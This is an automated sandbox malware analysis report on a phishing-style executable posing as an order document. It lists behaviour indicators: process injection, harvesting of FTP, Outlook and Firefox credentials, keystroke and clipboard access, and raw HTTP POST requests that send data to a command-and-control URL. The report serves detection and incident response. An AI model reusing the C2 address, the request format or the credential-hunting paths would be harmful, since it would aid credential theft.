OUR ORDER NO HSCLGD-140526.exe
This report is generated from a file or URL submitted to this webservice on May 14th 2019 06:29:56 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
-
Contains a remote desktop related string
Reads terminal service related keys (often RDP related) - Spyware
-
Contains ability to open the clipboard
Contains ability to open the clipboard
Contains ability to retrieve keyboard strokes
POSTs files to a webserver - Stealer/Phishing
-
Scans for artifacts that may help identify the target
Tries to steal FTP credentials - Persistence
- Writes data to a remote process
- Fingerprint
-
Contains ability to query information about shared network resources
Queries kernel debugger information
Queries sensitive IE security settings
Reads the active computer name
Reads the cryptographic machine GUID
Scans for artifacts that may help identify the target - Evasive
-
Marks file for deletion
Reads Antivirus engine related registry keys - Spreading
- Opens the MountPointManager (often used to detect additional infection locations)
- Network Behavior
- Contacts 1 domain. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 15
-
Anti-Detection/Stealthyness
-
Reads Antivirus engine related registry keys
- details
- "TVcard.exe" (Path: "HKLM\SOFTWARE\COMODOGROUP\ICEDRAGON\SETUP")
- source
- Registry Access
- relevance
- 8/10
- ATT&CK ID
- T1063 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads Antivirus engine related registry keys
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
-
7/70 reputation engines marked "http://blacklifestyle.net" as malicious (10% detection rate)
6/67 reputation engines marked "http://fuckav.ru" as malicious (8% detection rate)
12/70 reputation engines marked "http://blacklifestyle.net/sliver/power/energy/fre.php" as malicious (17% detection rate) - source
- External System
- relevance
- 10/10
- ATT&CK ID
- T1120 (Show technique in the MITRE ATT&CK™ matrix)
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 45/73 Antivirus vendors marked sample as malicious (61% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 45/73 Antivirus vendors marked sample as malicious (61% detection rate)
- source
- External System
- relevance
- 8/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
-
General
-
The analysis extracted a file that was identified as malicious
- details
- 29/73 Antivirus vendors marked dropped file "TVcard.exe" as malicious (classified as "Trojan.Generic" with 39% detection rate)
- source
- Binary File
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
29/73 Antivirus vendors marked spawned process "TVcard.exe" (PID: 4500) as malicious (classified as "Trojan.Generic" with 39% detection rate)
29/73 Antivirus vendors marked spawned process "TVcard.exe" (PID: 4484) as malicious (classified as "Trojan.Generic" with 39% detection rate) - source
- Monitored Target
- relevance
- 10/10
-
The analysis extracted a file that was identified as malicious
-
Installation/Persistance
-
Allocates virtual memory in a remote process
- details
- "OURORDERNOHSCLGD-140526.exe" allocated memory in "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{dcbfaac4-d863-11e7-b9ff-806e6f6e6963}"
- source
- API Call
- relevance
- 7/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Writes data to a remote process
- details
-
"OURORDERNOHSCLGD-140526.exe" wrote 32 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 580)
"OURORDERNOHSCLGD-140526.exe" wrote 52 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 580)
"OURORDERNOHSCLGD-140526.exe" wrote 4 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 580)
"TVcard.exe" wrote 32 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 160)
"TVcard.exe" wrote 52 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 160)
"TVcard.exe" wrote 4 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 160)
"TVcard.exe" wrote 663552 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 160) - source
- API Call
- relevance
- 6/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Allocates virtual memory in a remote process
-
Spyware/Information Retrieval
-
Scans for artifacts that may help identify the target
- details
-
"TVcard.exe" (Path: "HKCU\SOFTWARE\INCREDIMAIL\IDENTITIES")
"TVcard.exe" (Path: "HKLM\SOFTWARE\INCREDIMAIL\IDENTITIES")
"TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676")
"TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000001")
"TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000002")
"TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000003")
"TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\15.0\OUTLOOK\PROFILES\OUTLOOK")
"TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\16.0\OUTLOOK\PROFILES\OUTLOOK") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Tries to steal FTP credentials
- details
-
"%s\BlazeFtp\site.dat" (Indicator: "\blazeftp\")
"Software\FlashPeak\BlazeFtp\Settings" (Indicator: "\blazeftp\")
"%s\Estsoft\ALFTP\ESTdb2.dat" (Indicator: "\alftp\")
"%s\FTPGetter\Profile\servers.xml" (Indicator: "\ftpgetter\")
"%s\FTPGetter\servers.xml" (Indicator: "\ftpgetter\")
"ftware\FlashPeak\BlazeFtp\Settings" (Indicator: "\blazeftp\") - source
- File/Memory
- relevance
- 6/10
- ATT&CK ID
- T1081 (Show technique in the MITRE ATT&CK™ matrix)
-
Scans for artifacts that may help identify the target
-
Unusual Characteristics
-
Checks for a resource fork (ADS) file
- details
- "OURORDERNOHSCLGD-140526.exe" checked file "C:"
- source
- API Call
- relevance
- 5/10
-
References suspicious system modules
- details
- "lsass.exe"
- source
- File/Memory
- relevance
- 5/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Checks for a resource fork (ADS) file
-
Hiding 3 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 33
-
Anti-Detection/Stealthyness
-
Queries kernel debugger information
- details
- "TVcard.exe" at 00017421-00004484-00000105-6023503204
- source
- API Call
- relevance
- 6/10
-
Queries kernel debugger information
-
Anti-Reverse Engineering
-
Looks up many procedures within the same disassembly stream (often used to hide usage)
- details
-
Found 47 calls to GetProcAddress@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
Found 11 calls to GetProcAddress@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
Found 10 calls to GetProcAddress@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
PE file has unusual entropy sections
- details
- .rsrc with unusual entropies 7.51579763048
- source
- Static Parser
- relevance
- 10/10
-
Looks up many procedures within the same disassembly stream (often used to hide usage)
-
Environment Awareness
-
Contains ability to measure performance
- details
-
rdtsc from TVcard.exe (PID: 4500) (Show Stream)
rdtsc (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to query information about shared network resources
- details
-
EnumPrintersA@WINSPOOL.DRV from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
EnumPrintersA@WINSPOOL.DRV from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to read monitor info
- details
-
GetMonitorInfoA@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetMonitorInfoA@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetMonitorInfoA@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 5/10
- ATT&CK ID
- T1082 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the active computer name
- details
-
"OURORDERNOHSCLGD-140526.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"TVcard.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the cryptographic machine GUID
- details
- "TVcard.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to measure performance
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
1/69 reputation engines marked "http://ckav.ru" as malicious (1% detection rate)
7/70 reputation engines marked "http://blacklifestyle.net" as malicious (10% detection rate)
6/67 reputation engines marked "http://fuckav.ru" as malicious (8% detection rate)
12/70 reputation engines marked "http://blacklifestyle.net/sliver/power/energy/fre.php" as malicious (17% detection rate) - source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
General
-
Contains ability to find and load resources of a specific module
- details
-
FreeResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
LoadResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
LoadResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
FindResourceA@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
LoadResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
FreeResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
POSTs files to a webserver
- details
-
"POST /sliver/power/energy/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blacklifestyle.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A94C4A2C
Content-Length: 192
Connection: close" with no payload
"POST /sliver/power/energy/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blacklifestyle.net
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A94C4A2C
Content-Length: 165
Connection: close" with no payload - source
- Network Traffic
- relevance
- 5/10
-
Reads configuration files
- details
- "OURORDERNOHSCLGD-140526.exe" read file "%APPDATA%\Mozilla\Firefox\profiles.ini"
- source
- API Call
- relevance
- 4/10
-
Contains ability to find and load resources of a specific module
-
Installation/Persistance
-
Drops executable files
- details
- "TVcard.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Drops executable files
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.08 (Charon; Inferno)
- source
- Network Traffic
- relevance
- 10/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
-
Pattern Matching
-
Contains ability to download files from the internet
- details
- recv@WS2_32.DLL from TVcard.exe (PID: 4484) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to download files from the internet
-
Remote Access Related
-
Contains a remote desktop related string
- details
- "<.vnc" (Indicator for product: Generic VNC)
- source
- File/Memory
- relevance
- 10/10
-
Reads terminal service related keys (often RDP related)
- details
-
"OURORDERNOHSCLGD-140526.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED")
"TVcard.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1076 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains a remote desktop related string
-
Spyware/Information Retrieval
-
Contains ability to open the clipboard
- details
-
OpenClipboard@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
OpenClipboard@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
- ATT&CK ID
- T1115 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to retrieve keyboard strokes
- details
-
GetKeyboardState@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetKeyboardState@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetKeyboardState@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 8/10
- ATT&CK ID
- T1056 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to open the clipboard
-
System Destruction
-
Marks file for deletion
- details
-
"%LOCALAPPDATA%\TVcard.exe" marked "%APPDATA%\B52C16\66E7F2.lck" for deletion
"%LOCALAPPDATA%\TVcard.exe" marked "%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2092356043-4041700817-663127204-1001\c6e53759ff54727c35ea84c1a56f8b1f_733c94c5-cebb-4f98-a75f-22a797d1d50b" for deletion - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1107 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens file with deletion access rights
- details
-
"OURORDERNOHSCLGD-140526.exe" opened "%APPDATA%\B52C16\66E7F2.lck" with delete access
"TVcard.exe" opened "%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2092356043-4041700817-663127204-1001\c6e53759ff54727c35ea84c1a56f8b1f_733c94c5-cebb-4f98-a75f-22a797d1d50b" with delete access - source
- API Call
- relevance
- 7/10
-
Marks file for deletion
-
System Security
-
Modifies proxy settings
- details
-
"OURORDERNOHSCLGD-140526.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"OURORDERNOHSCLGD-140526.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries sensitive IE security settings
- details
- "OURORDERNOHSCLGD-140526.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies proxy settings
-
Unusual Characteristics
-
Imports suspicious APIs
- details
-
RegOpenKeyExA
RegCloseKey
OpenFileMappingA
WriteFile
GetModuleFileNameA
LoadLibraryExA
UnhandledExceptionFilter
GetModuleHandleA
CreateThread
GetTickCount
GetVersionExA
LoadLibraryA
GetStartupInfoA
GetFileSize
DeleteFileA
GetProcAddress
FindFirstFileA
GetComputerNameA
CreateFileA
LockResource
GetCommandLineA
Sleep
FindResourceA
VirtualAlloc
ShellExecuteA
GetCursorPos
GetUpdateRect
GetLastActivePopup
SetWindowsHookExA
FindWindowA
GetWindowThreadProcessId
EnumPrintersA
VirtualProtect - source
- Static Parser
- relevance
- 1/10
-
Installs hooks/patches the running process
- details
-
"OURORDERNOHSCLGD-140526.exe" wrote bytes "d0553776647340760000000051c1227694982276ee9c227675dc2476273e24760fb3287600000000acdc06761bf70676c1080876c0d90676152e067636da0676d5d9067630c60676e0c2067642c606761bc6067686c4067672c6067600000000" to virtual address "0x6EDE1000" (part of module "SHFOLDER.DLL")
"TVcard.exe" wrote bytes "d0553776647340760000000051c1227694982276ee9c227675dc2476273e24760fb3287600000000acdc06761bf70676c1080876c0d90676152e067636da0676d5d9067630c60676a0c4067642c606761bc6067686c4067672c6067600000000" to virtual address "0x6EDE1000" (part of module "SHFOLDER.DLL")
"TVcard.exe" wrote bytes "fdfe0676e0c50676ee29847710c6067600d0067600000000473f0c778a3f0c7728470c770000000096421e761b4b1e7618391e76b23a1e76b83e1e76196c1e7626681e76f5681e76000000009027d96e76b546772386497700000000" to virtual address "0x00415000" (part of module "TVCARD.EXE")
"TVcard.exe" wrote bytes "c04e827720548377e0658377b53884770000000000d0067600000000c5ea06760000000088ea067600000000e968937582288477ee29847700000000d2699375000000007dbb06760000000009be937500000000ba18067600000000" to virtual address "0x77A31000" (part of module "NSI.DLL")
"TVcard.exe" wrote bytes "fae67f77e1a684772e718477ee29847785e27f776da0847726e47f77d16d8477003d8277804b827700000000ad371e768b2d1e76b6411e7600000000" to virtual address "0x74B81000" (part of module "WSHTCPIP.DLL")
"TVcard.exe" wrote bytes "e7398077e1a684772e718477ee29847785e27f776da08477906483773ad58a7726e47f77d16d8477003d8277804b827700000000ad371e768b2d1e76b6411e7600000000" to virtual address "0x750E1000" (part of module "WSHIP6.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads information about supported languages
- details
- "OURORDERNOHSCLGD-140526.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
- source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Imports suspicious APIs
-
Hiding 7 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 24
-
Anti-Reverse Engineering
-
Found strings in conjunction with a procedure lookup that resolve to a known API export symbol
- details
-
Found reference to API InitCommonControlsEx@COMCTL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
Found reference to API ImageList_WriteEx@COMCTL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
Found reference to API FlatSB_SetScrollRange@COMCTL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
Found reference to API FlatSB_GetScrollInfo@COMCTL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
PE file contains zero-size sections
- details
-
Raw size of "BSS" is zero
Raw size of ".tls" is zero - source
- Static Parser
- relevance
- 10/10
-
Found strings in conjunction with a procedure lookup that resolve to a known API export symbol
-
Environment Awareness
-
Contains ability to query machine time
- details
-
GetLocalTime@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetLocalTime@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetLocalTime@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetLocalTime@KERNEL32.DLL from TVcard.exe (PID: 4500) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
- ATT&CK ID
- T1124 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to query the machine version
- details
-
GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetVersionExA@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetVersionExA@KERNEL32.DLL from TVcard.exe (PID: 4500) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query volume size
- details
-
GetDiskFreeSpaceA@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
GetDiskFreeSpaceA@KERNEL32.DLL from TVcard.exe (PID: 4500) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 3/10
- ATT&CK ID
- T1083 (Show technique in the MITRE ATT&CK™ matrix)
-
Makes a code branch decision directly after an API that is environment aware
- details
-
Found API call GetVersion@KERNEL32.DLL directly followed by "cmp ax, 0004h" and "setnb byte ptr [004C6AE0h]" from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
Found API call GetVersion@KERNEL32.DLL directly followed by "cmp ax, 0004h" and "jc 0045B016h" from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream)
Found API call GetVersion@KERNEL32.DLL directly followed by "cmp eax, 80000000h" and "je 00406E7Dh" from OURORDERNOHSCLGD-140526.exe (PID: 3896) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Possibly tries to detect the presence of a debugger
- details
-
GetProcessHeap@KERNEL32.DLL from TVcard.exe (PID: 4484) (Show Stream)
GetProcessHeap@KERNEL32.DLL from TVcard.exe (PID: 4484) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Queries volume information
- details
-
"TVcard.exe" queries volume information of "%APPDATA%\Mozilla\Firefox\Profiles\g4h7miqt.default\key3.db" at 00017421-00004484-0000010C-9786479558
"TVcard.exe" queries volume information of "%APPDATA%\Mozilla\Firefox\Profiles\g4h7miqt.default\secmod.db" at 00017421-00004484-0000010C-18790686681
"TVcard.exe" queries volume information of "C:\" at 00017421-00004484-0000010C-18827441709
"TVcard.exe" queries volume information of "%APPDATA%\Mozilla\Firefox\Profiles\g4h7miqt.default\cert8.db" at 00017421-00004484-0000010C-18830390262 - source
- API Call
- relevance
- 2/10
- ATT&CK ID
- T1120 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries volume information of an entire harddrive
- details
- "TVcard.exe" queries volume information of "C:\" at 00017421-00004484-0000010C-18827441709
- source
- API Call
- relevance
- 8/10
- ATT&CK ID
- T1120 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the registry for installed applications
- details
-
"OURORDERNOHSCLGD-140526.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\TVCARD.EXE")
"OURORDERNOHSCLGD-140526.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\TVCARD.EXE") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
- "blacklifestyle.net"
- source
- Network Traffic
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\6897110B52C166E7F20FBF0B"
"6897110B52C166E7F20FBF0B" - source
- Created Mutant
- relevance
- 3/10
-
Overview of unique CLSIDs touched in registry
- details
-
"OURORDERNOHSCLGD-140526.exe" touched "Computer" (Path: "HKCU\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\SHELLFOLDER")
"OURORDERNOHSCLGD-140526.exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}")
"OURORDERNOHSCLGD-140526.exe" touched "Security Manager" (Path: "HKCU\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}") - source
- Registry Access
- relevance
- 3/10
-
Spawns new processes
- details
-
Spawned process "TVcard.exe" (Show Process)
Spawned process "TVcard.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "TVcard.exe" (Show Process)
Spawned process "TVcard.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Connects to LPC ports
- details
- "OURORDERNOHSCLGD-140526.exe" connecting to "\ThemeApiPort"
- source
- API Call
- relevance
- 1/10
-
Contains ability to lookup the windows account name
- details
- GetUserNameExW@SSPICLI.DLL from TVcard.exe (PID: 4484) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Dropped files
- details
-
"TVcard.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"c6e53759ff54727c35ea84c1a56f8b1f_733c94c5-cebb-4f98-a75f-22a797d1d50b" has type "data"
"F.bmp" has type "PC bitmap Windows 3.x format 178 x 261 x 24" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\Fonts\StaticCache.dat"
"OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.7600.16385_en-us_020378a8991bbcc2\comctl32.dll.mui"
"OURORDERNOHSCLGD-140526.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"OURORDERNOHSCLGD-140526.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"OURORDERNOHSCLGD-140526.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db"
"OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\AppPatch\sysmain.sdb"
"OURORDERNOHSCLGD-140526.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"OURORDERNOHSCLGD-140526.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"OURORDERNOHSCLGD-140526.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db"
"TVcard.exe" touched file "C:\Windows\AppPatch\sysmain.sdb"
"TVcard.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"TVcard.exe" touched file "C:\Windows\System32\rsaenh.dll"
"TVcard.exe" touched file "C:\Windows\System32\tzres.dll" - source
- API Call
- relevance
- 7/10
-
Connects to LPC ports
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "Font.Name"
Heuristic match: "blacklifestyle.net"
Heuristic match: "ckav.ru"
Pattern match: "http://blacklifestyle.net/sliver/power/energy/fre.php"
Heuristic match: "Fuckav.ru"
Pattern match: "http://www.ibsensoftware.com/" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Creates or modifies windows services
- details
- "TVcard.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
-
"OURORDERNOHSCLGD-140526.exe" opened "\Device\KsecDD"
"TVcard.exe" opened "\Device\KsecDD" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Found Delphi 4 - Delphi 2006 artifact
- details
-
"17568511126f680d54035ef6bab48da803ca272f9f2817bc72a6bdaca67e87d2.bin" has a PE timestamp using the buggy magic timestamp 0x2A425E19.
"TVcard.exe" has a PE timestamp using the buggy magic timestamp 0x2A425E19. The real compilation date is probably Thu Jan 1 00:00:00 1970 - source
- Static Parser
- relevance
- 10/10
-
Matched Compiler/Packer signature
- details
- "17568511126f680d54035ef6bab48da803ca272f9f2817bc72a6bdaca67e87d2.bin" was detected as "Borland Delphi 4.0"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1002 (Show technique in the MITRE ATT&CK™ matrix)
-
Found Delphi 4 - Delphi 2006 artifact
File Details
OUR ORDER NO HSCLGD-140526.exe
- Filename
- OUR ORDER NO HSCLGD-140526.exe
- Size
- 1.5MiB (1620480 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Architecture
- WINDOWS
- SHA256
- 17568511126f680d54035ef6bab48da803ca272f9f2817bc72a6bdaca67e87d2
- MD5
- 8e3fe573d618d8aa5cc78a0c9ab7cfd7
- SHA1
- b8fb9fc12562e84649f7a15fb3c308ddf0252444
- ssdeep
